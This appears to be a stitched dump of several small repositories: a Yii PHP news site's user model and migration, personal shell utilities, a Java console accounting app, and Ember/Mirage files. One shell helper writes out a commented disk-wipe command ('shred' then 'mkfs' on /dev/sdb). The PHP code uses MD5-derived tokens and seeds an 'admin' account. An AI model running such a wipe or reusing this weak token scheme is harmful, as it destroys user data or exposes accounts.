['date_creation', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return $model->isNewRecord; }],
['date_modification', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return !$model->isNewRecord; }],
];
}
/**
* @inheritdoc
*/
public function attributeLabels() {
return [
'id' => '#',
'name' => 'Имя',
'email' => 'E-mail',
'newPassword' => '<PASSWORD>',
'confirmPassword' => 'Подтверждение',
'hash' => 'Хеш-код',
'type' => 'Тип',
'status' => 'Статус',
'date_creation' => 'Дата добавления',
'date_modification' => 'Дата изменения'
];
}
/**
* @return \yii\db\ActiveQuery
*/
public function getNews() {
return $this->hasMany(News::className(), ['user_id' => 'id']);
}
public function getTypes() {
return [
self::TYPE_USER => 'Пользователь',
self::TYPE_MODERATOR => 'Модератор',
self::TYPE_ADMIN => 'Администратор'
];
}
public function getStatuses() {
return [
self::STATUS_INACTIVE => 'Не активен',
self::STATUS_ACTIVE => 'Активен'
];
}
/**
* Finds user by username
*
* @param string $username
* @return static|null
*/
public static function findByUsername($username) {
return static::findOne(['email'=>$username, 'status'=>self::STATUS_ACTIVE]);
}
/**
* @inheritdoc
*/
public static function findIdentity($id) {
return static::findOne(['id'=>$id, 'status'=>self::STATUS_ACTIVE]);
}
/**
* @inheritdoc
*/
public static function findIdentityByAccessToken($token, $type = null) {
return static::findOne(['hash'=>$token]);
}
/**
* @inheritdoc
*/
public function getId() {
return $this->id;
}
/**
* @inheritdoc
*/
public function getAuthKey() {
return $this->hash;
}
/**
* @inheritdoc
*/
public function validateAuthKey($authKey) {
return $this->hash === $authKey;
}
/**
* Validates password
*
* @param string $password <PASSWORD> to validate
* @return bool if password provided is valid for current user
*/
public function validatePassword($password) {
$bcrypt = new \app\components\Bcrypt();
return $bcrypt->verify($password, $this->password);
}
public function afterSave($insert, $changedAttributes) {
parent::afterSave($insert, $changedAttributes);
if ($insert) {
if ($this->newPassword) {
$bcrypt = new \app\components\Bcrypt();
$this->password = $bcrypt->hash($this->newPassword);
}
$this->hash = md5($this->email.$this->newPassword.time());
$this->save(false, ['password', 'hash']);
$activation_url = Url::to(['site/activate', 'key'=>$this->hash], 'http');
Yii::$app->mailer->compose()
->setFrom(['<EMAIL>'])
->setTo($this->email)
->setSubject('Добро пожаловать на '.Yii::$app->name)
->setTextBody('Ваша ссылка для активации профиля: '.$activation_url)
->setHtmlBody('<b>Ваша ссылка для активации профиля: </b> '.Html::a($activation_url, $activation_url))
->send();
Yii::$app->mailer->compose()
->setFrom(['<EMAIL>'])
->setTo(User::findOne(User::SUPER_ADMIN_ID)->email)
->setSubject('Регистрация нового пользователя на '.Yii::$app->name)
->setTextBody('Новый пользователь на сайте: '.$this->email)
->setHtmlBody('<b>Новый пользователь на сайте: </b> '.$this->email)
->send();
}
}
}
<file_sep>/views/site/register.php
<?php
/* @var $this yii\web\View */
/* @var $model app\models\User */
/* @var $form ActiveForm */
use yii\helpers\Html;
use yii\bootstrap\ActiveForm;
use yii\bootstrap\Alert;
$this->title = 'Регистрация';
$this->params['breadcrumbs'][] = $this->title;
?>
<div class="site-register">
<h1><?= Html::encode($this->title) ?></h1>
<?php if (Yii::$app->session->hasFlash('successRegistered')) echo Alert::widget([
'options' => ['class' => 'alert-success'],
'body' => 'Регистрация прошла успешно.<br> Вам выслано письмо со ссылкой для активации профиля.'
]); ?>
<?php $form = ActiveForm::begin([
'id' => 'register-form',
'layout' => 'horizontal',
'fieldConfig' => [
'template' => "{label}\n<div class=\"col-lg-4\">{input}</div>\n<div class=\"col-lg-6\">{error}</div>",
'labelOptions' => ['class' => 'col-lg-2 control-label'],
],
'enableAjaxValidation' => true
]); ?>
<?=$form->field($model, 'name') ?>
<?=$form->field($model, 'email') ?>
<?=$form->field($model, 'newPassword')->passwordInput() ?>
<?=$form->field($model, 'confirmPassword')->passwordInput() ?>
<div class="form-group">
<?= Html::submitButton('Отправить', ['class' => 'btn btn-primary']) ?>
</div>
<?php ActiveForm::end(); ?>
</div><!-- site-register -->
<file_sep>/models/News.php
<?php
namespace app\models;
use Yii;
use yii\db\Expression;
/**
* This is the model class for table "news".
*
* @property string $id
* @property string $title
* @property string $about
* @property string $text
* @property string $user_id
* @property string $date_creation
* @property string $date_modification
*
* @property User $user
*/
class News extends \yii\db\ActiveRecord {
/**
* @inheritdoc
*/
public static function tableName() {
return 'news';
}
/**
* @inheritdoc
*/
public function rules() {
return [
[['title', 'about', 'text'], 'required'],
[['title'], 'string', 'max' => 255],
[['about', 'text'], 'string'],
[['user_id'], 'default', 'value'=>Yii::$app->user->id],
['date_creation', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return $model->isNewRecord; }],
['date_modification', 'default', 'value'=>new Expression('NOW()'), 'when'=>function($model) { return !$model->isNewRecord; }],
[['user_id'], 'exist', 'skipOnError' => true, 'targetClass' => User::className(), 'targetAttribute' => ['user_id' => 'id']],
];
}
/**
* @inheritdoc
*/
public function attributeLabels() {
return [
'id' => '#',
'title' => 'Название',
'about' => 'Краткое описание',
'text' => 'Текст новости',
'user_id' => 'Автор',
'date_creation' => 'Дата добавления',
'date_modification' => 'Дата изменения'
];
}
/**
* @return \yii\db\ActiveQuery
*/
public function getUser() {
return $this->hasOne(User::className(), ['id' => 'user_id']);
}
}
<file_sep>/migrations/m171009_091833_create_user_table.php
<?php
use yii\db\Migration;
/**
* Handles the creation of table `user`.
*/
class m171009_091833_create_user_table extends Migration {
/**
* @inheritdoc
*/
public function up() {
$this->createTable('user', [
'id' => $this->primaryKey()->unsigned(),
'name' => $this->string(32)->notNull(),
'email' => $this->string(64)->notNull()->unique(),
'password' => $this->binary(60),
'hash' => $this->string(64),
'type' => $this->smallInteger(1),
'status' => $this->smallInteger(1),
'date_creation' => $this->timestamp(),
'date_modification' => $this->timestamp()
]);
$bcrypt = new \app\components\Bcrypt();
$this->insert('user', [
'name' => 'Админ',
'email' => 'admin',
'password' => $<PASSWORD>('<PASSWORD>'),
'hash' => md5(time()),
'type' => \app\models\User::TYPE_ADMIN,
'status' => \app\models\User::STATUS_ACTIVE,
'date_creation' => new \yii\db\Expression('NOW()')
]);
}
/**
* @inheritdoc
*/
public function down() {
$this->dropTable('user');
}
}
|
3fcde8974ea8a45330d689c7e13c68f9aab36d5f
|
[
"Markdown",
"PHP"
] | 8 |
Markdown
|
Savoy/News_test
|
0f893edcbf8e3b33e28db424ea218ae5087228a5
|
ba6f46e177e59fb5cba59543af1a0bbdce08f279
|
refs/heads/master
|
<repo_name>karmanova-ya/ReDi-AccountingProject<file_sep>/src/main/java/model/BankAccount.java
package model;
import java.io.Serializable;
public class BankAccount implements Serializable {
private static final long serialVersionUID = 1L;
private String bankName;
private double balance = 0;
public BankAccount(String bankName) {
this.bankName = bankName;
}
public String getBankName() {
return bankName;
}
public void setBankName(String bankName) {
this.bankName = bankName;
}
public double getBalance() {
return balance;
}
public void setBalance(double balance) {
this.balance = balance;
}
}
<file_sep>/src/main/java/model/Income.java
package model;
import utils.DateUtils;
public class Income extends Transaction{
private IncomeCategory inCategory;
@Override
public String toString() {
return "Income {" +
", amount=" + getAmount() +
", category=" + inCategory +
", month=" + DateUtils.month(getMonth()) +
", year=" + getYear() +
'}';
}
public IncomeCategory getInCategory() {
return inCategory;
}
public void setInCategory(IncomeCategory inCategory) {
this.inCategory = inCategory;
}
}
<file_sep>/src/main/java/services/StaticticService.java
package services;
import model.Income;
import model.Payment;
import model.PaymentCategory;
import repository.IncomeStorage;
import repository.PaymentStorage;
import utils.DateUtils;
import java.util.*;
public class StaticticService {
private final PaymentStorage paymentStorage;
private final IncomeStorage incomeStorage;
public StaticticService(PaymentStorage paymentStorage, IncomeStorage incomeStorage) {
this.paymentStorage = paymentStorage;
this.incomeStorage = incomeStorage;
}
//Give the user opportunity to choose what statistics they want to see:
public void selectStatistics() {
Scanner input = new Scanner(System.in);
System.out.println("Enter what statistics you want to see:");
System.out.println(
// totalSpendingByMonth totalSpending biggestPayment biggestIncome totalIncome paymentAlphGrouping totalSpendingByYear
"1 - My biggest payment\n" +
"2 - My biggest income\n" +
"3 - My total spending\n" +
"4 - My total income\n" +
"5 - Spendings sorted alphabetically\n" +
"6 - Statistics for 1 month\n" +
"7 - Statistics for 1 year\n" +
"0 - exit\n");
boolean isContinue = true;
while (isContinue) {
System.out.print("User's input> ");
int cat = input.nextInt();
switch (cat) {
case 1:
biggestPayment();
break;
case 2:
biggestIncome();
break;
case 3:
totalSpending();
break;
case 4:
totalIncome();
break;
case 5:
paymentAlphGrouping();
break;
case 6:
System.out.println("Enter a month:");
cat = input.nextInt();
totalSpendingByMonth(cat);
break;
case 7:
System.out.println("Enter a year:");
cat = input.nextInt();
totalSpendingByYear(cat);
break;
case 0:
System.out.println("See you next time :)\n");
isContinue = false;
break;
default:
System.out.println("Please clarify your answer\n");
}
}
}
//Show the user their the most expensive payment
public Payment biggestPayment() {
Payment big = null;
for (Payment payment : paymentStorage.getPayments()) {
if (big == null) {
big = payment;
} else if (payment.getAmount() < 0 && big.getAmount() > payment.getAmount()) {
big = payment;
}
}
System.out.println("The biggest payment is: " + big);
return big;
}
//Show the user their biggest income
public Income biggestIncome() {
Income big = null;
for (Income income : incomeStorage.getIncomes()) {
if (income.getAmount() > 0) {
if (big == null) {
big = income;
} else if (big.getAmount() < income.getAmount()) {
big = income;
}
}
}
System.out.println("The biggest income is: " + big);
return big;
}
//Show the user their total spending
public double totalSpending() {
double sum = 0;
for (Payment payment : paymentStorage.getPayments()) {
sum += payment.getAmount();
}
System.out.println("You spent in total: " + sum);
return sum;
}
//Show the user their total income
public double totalIncome() {
double sum = 0;
for (Income income : incomeStorage.getIncomes()) {
if (income.getAmount() > 0) {
sum += income.getAmount();
}
}
System.out.println("The total income is: " + sum);
return sum;
}
//Show the user their spending grouped by type, alphabetically ordered by the type name
public void paymentAlphGrouping() {
TreeMap<PaymentCategory, Double> alphabetSort = new TreeMap();
for (Payment payment : paymentStorage.getPayments()) {
PaymentCategory paymentCategory = payment.getPaymentCategory();
if (alphabetSort.containsKey(paymentCategory)) {
double sum = alphabetSort.get(paymentCategory) + payment.getAmount();
alphabetSort.put(paymentCategory, sum);
} else {
alphabetSort.put(paymentCategory, payment.getAmount());
}
}
System.out.println("How do you spend your money: ");
for (Map.Entry<PaymentCategory, Double> entry : alphabetSort.entrySet()) {
System.out.println(entry);
}
}
//Show spendings & earnings grouped by month during this year, chronologically ordered.
public void totalSpendingByMonth(int month) {
HashMap<Integer, Double> spendings = new HashMap();
HashMap<Integer, Double> earnings = new HashMap();
for (Payment payment : paymentStorage.getPayments()) {
month = payment.getMonth();
Date key = new GregorianCalendar(payment.getYear(), payment.getMonth() - 1, 0).getTime();
if (spendings.containsKey(month)) {
Double currentSum = spendings.get(month);
currentSum += payment.getAmount();
spendings.put(month, currentSum);
} else {
spendings.put(month, payment.getAmount());
}
}
for (Income income : incomeStorage.getIncomes()) {
month = income.getMonth();
Date key = new GregorianCalendar(income.getYear(), income.getMonth() - 1, 0).getTime();
if (earnings.containsKey(month)) {
Double currentSum = earnings.get(month) + income.getAmount();
earnings.put(month, currentSum);
} else {
earnings.put(month, income.getAmount());
}
}
for (int i = 1; i <= 12; i++) {
System.out.println("In " + DateUtils.month(i) + " you spent: " + spendings.getOrDefault(i, 0d) + "€" + " and earned: " + earnings.getOrDefault(i, 0d) + "€");
}
}
//Show spendings & earnings grouped by month during chosen year, chronologically ordered.
public void totalSpendingByYear(int year) {
HashMap<Integer, Double> spendings = new HashMap<>();
HashMap<Integer, Double> earnings = new HashMap<>();
for (Payment payment : paymentStorage.getPayments()) {
Integer month = payment.getMonth();
Date key = new GregorianCalendar(year, payment.getMonth() - 1, 0).getTime();
if (payment.getYear() == year) {
if (spendings.containsKey(month)) {
Double currentSum = spendings.get(month);
currentSum += payment.getAmount();
spendings.put(month, currentSum);
} else {
spendings.put(month, payment.getAmount());
}
}
}
for (Income income : incomeStorage.getIncomes()) {
Integer month = income.getMonth();
Date key = new GregorianCalendar(year, income.getMonth() - 1, 0).getTime();
if (income.getYear() == year) {
if (earnings.containsKey(month)) {
Double currentSum = earnings.get(month) + income.getAmount();
earnings.put(month, currentSum);
} else {
earnings.put(month, income.getAmount());
}
}
}
for (int i = 1; i <= 12; i++) {
Double spent = spendings.get(i);
Double earned = earnings.get(i);
if (spent != null || earned != null) {
System.out.println("In " + DateUtils.month(i) + " " + year + " you spent: " + spendings.getOrDefault(i, 0d) + "€" + " and earned: " + earnings.getOrDefault(i, 0d) + "€");
}
}
}
}
<file_sep>/src/main/java/model/PaymentCategory.java
package model;
public enum PaymentCategory {
ENTERTAINMENT, CAFE, TRANSPORT, GROCERY;
}<file_sep>/src/test/java/TransactionServiceTest.java
import model.BankAccount;
import model.PaymentCategory;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.BeforeAll;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import repository.IncomeStorage;
import repository.PaymentStorage;
import services.TransactionService;
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import static org.junit.jupiter.api.Assertions.*;
import static org.junit.jupiter.api.Assertions.assertEquals;
public class TransactionServiceTest {
PaymentStorage ps;
IncomeStorage is;
TransactionService ts;
String bankName;
BankAccount deutscheBank;
@BeforeEach
void init() {
ps = new PaymentStorage();
is = new IncomeStorage();
ts = new TransactionService(ps, is);
// bankName = "Deutsche Bank";
deutscheBank = new BankAccount(bankName);
}
// @Test
// public void end2End() {
// assertTrue(deutscheBank.getBankName().equals("Deutsche Bank"));
// }
@Test
public void testDepositWithdraw() {
double depositAmount = 100;
ts.deposit(deutscheBank, depositAmount);
assertEquals(100, deutscheBank.getBalance());
double withdrawAmount = 30;
ts.withdraw(deutscheBank, withdrawAmount);
assertEquals(70, deutscheBank.getBalance());
}
@Test
public void testAddPayCategoryPositiv() {
String input = "e";
InputStream in = new ByteArrayInputStream(input.getBytes());
System.setIn(in);
assertTrue(ts.addPayCategory().equals(PaymentCategory.ENTERTAINMENT));
}
// @Test
// public void testAddPayCategoryNegativ() {
// String input = "y";
// InputStream in = new ByteArrayInputStream(input.getBytes());
// System.setIn(in);
// assertFalse(ts.addPayCategory().equals(PaymentCategory.ENTERTAINMENT));
// }
@Test
public void testAddInCategory() {
}
@Test
public void testAddPaymentDate() {
}
@Test
public void testAddPayment() {
}
@Test
public void testAddIncome() {
}
// BankAccount bankAccount;
// if (f.exists() && !f.isDirectory()) {
// bankAccount = readBankAcc();
// } else {
// bankAccount = createBankAcc();
// }
//
// System.out.println("Do you want add some money? (y/n)");
// String answer = input.next();
// double deposit = 0;
// if (answer.equals("y")) {
// try {
// System.out.println("Input here -->");
// deposit = input.nextDouble();
// transactionService.deposit(bankAccount, deposit);
// } catch (InputMismatchException e) {
// System.out.println("This does not really make sense, sorry. Please add an amount instead of text.");
// System.out.println("Input here -->");
// deposit = input.nextDouble();
// transactionService.deposit(bankAccount, deposit);
// }
// }
//
// System.out.println("Do you want to add payment(p) or income(i)?");
// String typeOfPayment = input.next();
// if (typeOfPayment.equals("p")) {
// transactionService.addPayment();
// } else if (typeOfPayment.equals("i")) {
// transactionService.addIncome();
// } else {
// System.out.println("Please clarify your answer\n");
// }
//
// System.out.println("Do you want to see transaction statistic? (y/n)");
// String userSelection = input.next();
// if (userSelection.equals("y")) {
// staticticService.selectStatistics();
// } else {
// System.out.println("Please clarify your answer\n");
// staticticService.selectStatistics();
// }
// }
}
<file_sep>/src/main/java/Main.java
import model.BankAccount;
import repository.IncomeStorage;
import repository.PaymentStorage;
import services.StaticticService;
import services.TransactionService;
import java.io.*;
import java.util.InputMismatchException;
import java.util.Scanner;
//add expenses and earnings through the console
//retrieve all previously inserted expenses and earnings
//receive summaries and balances
//#Bonus: ↗️
//If this is too simple, here some ideas how you can make the project more complex, potentially using more tools too:
//
//save and load data to and from file, to use it later on
//have a simple user management system that allows different users to register and log in the system, and store their data in different files
//use a real db!
public class Main {
//create file with Bank Account data
public static BankAccount createBankAcc() throws IOException {
Scanner in = new Scanner(System.in);
System.out.println("Let create your bank account!");
System.out.print("Input bank name - ");
String bn = in.nextLine();
BankAccount bankAccount = new BankAccount(bn);
FileOutputStream fout = new FileOutputStream("bankAccount.ser");
ObjectOutputStream oos = new ObjectOutputStream(fout);
oos.writeObject(bankAccount);
return bankAccount;
}
//read file with Bank Account data
public static BankAccount readBankAcc() throws IOException, ClassNotFoundException {
ObjectInputStream objectinputstream = null;
FileInputStream streamIn = new FileInputStream("bankAccount.ser");
objectinputstream = new ObjectInputStream(streamIn);
BankAccount bankAccount = (BankAccount) objectinputstream.readObject();
return bankAccount;
}
//create Menu method with selection
public static void menu() {
Scanner input = new Scanner(System.in);
System.out.println("");
}
public static void main(String[] args) throws IOException, ClassNotFoundException {
Scanner input = new Scanner(System.in);
PaymentStorage paymentStorage = new PaymentStorage();
IncomeStorage incomeStorage = new IncomeStorage();
TransactionService transactionService = new TransactionService(paymentStorage, incomeStorage);
StaticticService staticticService = new StaticticService(paymentStorage, incomeStorage);
//-----------------------------------------------
// checking to see if the account was created or not
File f = new File("bankAccount.ser");
BankAccount bankAccount;
if (f.exists() && !f.isDirectory()) {
bankAccount = readBankAcc();
} else {
bankAccount = createBankAcc();
}
System.out.println("Do you want add some money? (y/n)");
String answer = input.next();
double deposit = 0;
if (answer.equals("y")) {
try {
System.out.println("Input here -->");
deposit = input.nextDouble();
transactionService.deposit(bankAccount, deposit);
} catch (InputMismatchException e) {
System.out.println("This does not really make sense, sorry. Please add an amount instead of text.");
System.out.println("Input here -->");
deposit = input.nextDouble();
transactionService.deposit(bankAccount, deposit);
}
}
System.out.println("Do you want to add payment(p) or income(i)?");
String typeOfPayment = input.next();
if (typeOfPayment.equals("p")) {
transactionService.addPayment();
} else if (typeOfPayment.equals("i")) {
transactionService.addIncome();
} else {
System.out.println("Please clarify your answer\n");
}
System.out.println("Do you want to see transaction statistic? (y/n)");
String userSelection = input.next();
if (userSelection.equals("y")) {
staticticService.selectStatistics();
} else {
System.out.println("Please clarify your answer\n");
staticticService.selectStatistics();
}
}
}
<file_sep>/src/test/java/ExampleTest.java
import model.BankAccount;
import services.TransactionService;
import java.util.Scanner;
//
//public class DUmmy {
// @Test
// public void end2End() {
//
//
// String bankName = "Commrcebank";
//// String secondBName = input.nextLine();
// BankAccount deutscheBank = new BankAccount(bankName);
//// BankAccount n26 = new BankAccount(secondBName);
// assert deutscheBank.getBankName().equals("Commrercebank");
//
//
// double deposit = 100;
//
// TransactionService db = new TransactionService();
//
// db.deposit(deutscheBank, deposit);
//
//
// // wether bank has money
// asset deutscheBank.getBalance() == 0;
// }
//}
<file_sep>/src/main/java/repository/IncomeStorage.java
package repository;
import model.Income;
import java.util.HashSet;
public class IncomeStorage {
HashSet<Income> incomes = new HashSet();
public void addIncome(Income income){
incomes.add(income);
}
public HashSet<Income> getIncomes() {
return incomes;
}
}
<file_sep>/src/main/java/services/TransactionService.java
package services;
import model.*;
import repository.IncomeStorage;
import repository.PaymentStorage;
import utils.DateUtils;
import java.util.Scanner;
public class TransactionService {
private final PaymentStorage paymentStorage;
private final IncomeStorage incomeStorage;
public TransactionService(PaymentStorage paymentStorage, IncomeStorage incomeStorage) {
this.paymentStorage = paymentStorage;
this.incomeStorage = incomeStorage;
}
//deposit of money in a bank account
public void deposit(BankAccount accTo, double money) { // Unit testing
accTo.setBalance(money);
System.out.println(money + "€ has been transferred to your " + accTo.getBankName() + " account");
}
//account withdraw
public void withdraw(BankAccount bAcc, double money) {
if (money <= bAcc.getBalance()) {
double newBalance = bAcc.getBalance() - money;
bAcc.setBalance(newBalance);
System.out.println("You withdraw from account " + money + "€");
System.out.println("Current account status: " + bAcc.getBalance() + "€");
} else {
System.out.print(" You don't have enough money on your balance :(");
System.out.println("Current account status: " + bAcc.getBalance() + "€");
}
}
public PaymentCategory addPayCategory() {
Scanner input = new Scanner(System.in);
System.out.println("Select your spending category: ");
System.out.println("ENTERTAINMENT (e), CAFE(c), TRANSPORT(t), GROCERY(g)");
String cat = input.next();
PaymentCategory payCat = null;
boolean isContinue = true;
while (isContinue) {
switch (cat) {
case "e":
payCat = PaymentCategory.ENTERTAINMENT;
isContinue = false;
break;
case "c":
payCat = PaymentCategory.CAFE;
isContinue = false;
break;
case "t":
payCat = PaymentCategory.TRANSPORT;
isContinue = false;
break;
case "g":
payCat = PaymentCategory.GROCERY;
isContinue = false;
break;
default:
System.out.println("Invalid category. Please check your input\n");
System.out.println("Select your spending category: ");
System.out.println("ENTERTAINMENT (e), CAFE(c), TRANSPORT(t), GROCERY(g)");
cat = input.next();
}
}
return payCat;
}
public IncomeCategory addInCategory() {
Scanner input = new Scanner(System.in);
System.out.println("Select your income category: ");
System.out.println("SALARY(s), DIVIDEND(d), KINDERGELD(k)");
String cat = input.next();
IncomeCategory inCat = null;
boolean isContinue = true;
while (isContinue) {
switch (cat) {
case "s":
inCat = IncomeCategory.SALARY;
isContinue = false;
break;
case "d":
inCat = IncomeCategory.DIVIDEND;
isContinue = false;
break;
case "k":
inCat = IncomeCategory.KINDERGELD;
isContinue = false;
break;
default:
System.out.println("Invalid category. Please check your input\n");
System.out.println("Select your income category: ");
System.out.println("SALARY(s), DIVIDEND(d), KINDERGELD(k)");
cat = input.next();
}
}
return inCat;
}
public String addPaymentDate(Transaction transaction) { // Unit testing
Scanner input = new Scanner(System.in);
System.out.print("Enter month -> ");
int month = input.nextInt();
boolean validMonth = false;
while (!validMonth) {
if (month > 0 && month <= 12) {
transaction.setMonth(month);
validMonth = true;
} else {
System.out.println("Invalid date. Please check your input\n");
System.out.print("Enter month -> ");
month = input.nextInt();
}
}
System.out.print("Enter year -> ");
int year = input.nextInt();
boolean validYear = false;
while (!validYear) {
if (year == 2019 || year == 2020) {
transaction.setYear(year);
validYear = true;
} else {
System.out.println("Invalid date. Please check your input\n");
System.out.print("Enter year -> ");
year = input.nextInt();
}
}
return DateUtils.month(month) + " " + year;
}
//add some payments in our bank
public void addPayment() { // Unit testing
Scanner input = new Scanner(System.in);
Payment payment = new Payment();
System.out.print("Enter amount -> ");
double amount = input.nextDouble();
payment.setPaymentCategory(addPayCategory());
payment.setAmount(-amount);
String date = addPaymentDate(payment);
PaymentStorage paymentStorage = new PaymentStorage();
paymentStorage.addPayment(payment);
System.out.println("You added a transaction: " + payment.getPaymentCategory() + " --> " + payment.getAmount() * (-1) + "€ --> " + date);
}
//add income transactions in our bank
public void addIncome() { // Unit testing
Scanner input = new Scanner(System.in);
Income income = new Income();
System.out.print("Enter amount -> ");
double amount = input.nextDouble();
income.setInCategory(addInCategory());
income.setAmount(amount);
String date = addPaymentDate(income);
IncomeStorage incomeStorage = new IncomeStorage();
incomeStorage.addIncome(income);
System.out.println("You added a transaction: " + income.getInCategory() + " --> " + income.getAmount() + "€ --> " + date);
}
// void transfer(BankAccount accTo, double tranTo) {
// withdraw(BankAccount bAcc, tranTo);
//
//// accTo.deposit(tranTo);
// System.out.println("Transfer complete!");
// System.out.println(this.bankName + " - " + this.getBalance());
// System.out.println(accTo.bankName + " - " + accTo.getBalance());
// }
}
|
58235257ea45384dbf07996655c00570c4b071df
|
[
"Java"
] | 9 |
Java
|
karmanova-ya/ReDi-AccountingProject
|
adf5afcfbda56ab73a2e4a8927bd78f938fa05e6
|
0b6aad26a6d3710820e13cafefb1bf8d8d3612f8
|
refs/heads/master
|
<file_sep>#!/bin/bash
# Escrito por: <NAME>.
# Descrição: Apaga partições no HD ou Flash_Memory sobrescrevindo
# dados aleatorios. Também util para recuperar penDrive apos ser
# usado para a instalação de linux.
echo " "
echo "Mostra as partições reconhecidas pelo sistema."
echo " "
fdisk -l
echo " "
echo "Selecione a partição desejada"
echo " "
echo "Linha comentada: shred -n 5 -vz /dev/sdb <-Tempo aprox. 20 min"
echo "Modifique a partição desejada antes de descomentar"
#shred -n 5 -vz /dev/sdb
#mkfs.vfat -n "MemLabel" -I /dev/sdb1
echo " "
echo "Pronto"
<file_sep>#!/bin/bash
# Escrito por: <NAME>
# Descrição: Limpa arquivos temporários do latex gerados durante
# A compilação.
#
# Algumas informações sobre redirecionar para /dev/null:
#
# Anular a saída:
# ls arquivo_nao_existente 1> /dev/null
# ou resumindo...
# ls arquivo_nao_existente > /dev/null
#
# Anular a mensagem de erro:
# ls arquivo_nao_existente 2> /dev/null
#
# Anular a saída e a mensagem de erro:
# rm arquivo_nao_existente > /dev/null 2> /dev/null
# ou resumindo...
# rm arquivo_nao_existente > /dev/null 2>&1
echo "> Excluindo arquivos temporarios do latex..."
rm *.aux 2> /dev/null
rm *.bbl 2> /dev/null
rm *.blg 2> /dev/null
rm *.brf 2> /dev/null
rm *.dvi 2> /dev/null
rm *.fdb_latexmk 2> /dev/null
rm *.fls 2> /dev/null
rm *.idx 2> /dev/null
rm *.ilg 2> /dev/null
rm *.ind 2> /dev/null
rm *.lof 2> /dev/null
rm *.log 2> /dev/null
rm *.lot 2> /dev/null
rm *.nav 2> /dev/null
rm *.out 2> /dev/null
rm *.run.xml 2> /dev/null
rm *.snm 2> /dev/null
rm *.synctex.gz 2> /dev/null
rm *.synctex.gz\(busy\) 2> /dev/null
rm *.toc 2> /dev/null
rm *-blx.bib 2> /dev/null
echo "> Pronto!"
<file_sep>#!/usr/bin/sh
# Escrito por: <NAME>
# Descrição: Formata PDF's escaneados invertidos
#livro com 158 paginas... girar paginas pares 270 graus e paginas impares 90 graus
for i in $(seq 158);
do
if [ $(($i%2)) -eq '0' ]; then
pdf270 source.pdf $i --outfile pagina$i.pdf;
else
pdf90 source.pdf $i --outfile pagina$i.pdf;
fi
done
pdfjam pagina?.pdf pagina??.pdf pagina???.pdf --landscape --outfile output.pdf
rm pagina*.pdf
<file_sep>#!/bin/bash
#Pasta com lista de imagens denominadas teste1.bmp, teste2.bmp, ...
echo " "
echo "Convirtindo..."
echo " "
mencoder "mf://teste%d.bmp" -mf fps=15 -o out.avi -ovc lavc -lavcopts vcodec=mpeg4:vbitrate=800
echo " "
echo "Pronto!"
echo " "
<file_sep>#!/usr/bin/sh
# Escrito por: <NAME>
# Descrição: Compilando arquivos .pov (povray)
if [ "$#" == "0" ]; then
echo "Uso: pov.sh [OPÇÃO] arquivo"
echo "Configura a mensagem de tela bloqueada. Se não for especificada opção a mensagem atual será removida."
echo ""
echo "Opções válidas:"
echo "fast - Compilação rápida"
echo "best - Compilação ótima"
else
case $1 in
"fast") povray +w800 +h600 hello.pov $2;;
"best") povray +A0.0 +Q9 +R9 +w800 +h600 $2;;
*) echo "Opção desconhecida! Digite: "pov.sh" sem parâmetros para visualizar lista de opções";;
esac
fi
<file_sep>for file in *.tex; do
iconv -f iso8859-1 -t utf-8 "$file" -o "${file%.tex}.out.tex"
done
<file_sep>Shell Scripts
Ferramentas de consola para diversas aplicações.
---
<NAME>.
<NAME>
<file_sep>#!/bin/bash
echo " "
echo "*** Obtendo informacao do CD... ***"
echo " "
cdparanoia -vsQ
echo " "
echo "*** Extraindo musica inicialmente sem compressao... ***"
echo " "
cdparanoia -B
echo " "
echo "*** Convirtindo arquivos a formato mp3 ***"
echo " "
#COUNT=$(find . -maxdepth 1 -type f -print| wc -l) <-- Conta quantos arquivos
#tem e joga na variavel
for t in track0{1..9}*.wav; do lame -b160 $t; done
#for t in track{10..$COUNT}*.wav; do lame -b160 $t; done <-- Quando aplico aqui
#da pau
for t in track{1..15}*.wav; do lame -b160 $t; done #<-- Por isso coloco 15
#mas deveria ser o num maximo de arquivos
echo " "
echo "*** Apagando arquivos sem compressao... ***"
rm *.wav
echo " "
echo "Pronto!"
echo " "
|
f5709e2e87e4451d15dd9d08b43006f21ffa9674
|
[
"Markdown",
"Shell"
] | 8 |
Shell
|
thomazrb/shellscript
|
a9c1500a2b4269371f898cc343b4bf008a874d7a
|
e839a1e136994a48ce1f1aa08a85fc6a49159378
|
refs/heads/master
|
<repo_name>Subaku/mirage-issue<file_sep>/tests/integration/helpers/semantic-date-test.js
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import hbs from 'htmlbars-inline-precompile';
module('Integration | Helper | semantic-date', function(hooks) {
setupRenderingTest(hooks);
let dt = '2019-12-05T12:27:08Z';
hooks.beforeEach(function() {
this.set('dtStr', dt);
});
test('it renders to default format', async function(assert) {
await render(hbs`{{semantic-date dtStr}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('12:27pm 12/05');
});
test('it renders with given format', async function(assert) {
await render(hbs`{{semantic-date dtStr fmt="YYYY/DD/MM hh"}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('2019/05/12 12');
});
test('it renders for given timezone', async function(assert) {
await render(hbs`{{semantic-date dtStr tz="US/Eastern"}}`);
assert.dom('time').hasAttribute('datetime', dt);
assert.dom('time').hasText('7:27am 12/05');
});
});
<file_sep>/tests/integration/components/constants.js
export const visionOptions = [
'Seen',
'Not Seen'
];
export const timeTypes = [
'days',
'hours'
];
<file_sep>/app/adapters/application.js
import DRFAdapter from './drf';
export default class ApplicationAdapter extends DRFAdapter {
pathForType(type) {
// No pluralization
return type;
}
}
<file_sep>/app/serializers/asset-location-summary.js
import DS from 'ember-data';
import { isNone } from '@ember/utils';
import ApplicationSerializer from './application';
const { EmbeddedRecordsMixin } = DS;
export default class AssetLocationSummarySerializer extends ApplicationSerializer.extend(EmbeddedRecordsMixin) {
attrs = {
location: { embedded: 'always' }
};
// extractId(modelClass, resourceHash) {
// return isNone(resourceHash['location']) ? -1 : resourceHash['location']['id'];
// }
}
<file_sep>/mirage/factories/asset.js
import { Factory } from 'ember-cli-mirage';
import faker from 'faker';
export default Factory.extend({
name() {
return faker.lorem.word();
},
assetType() {
return faker.lorem.word();
},
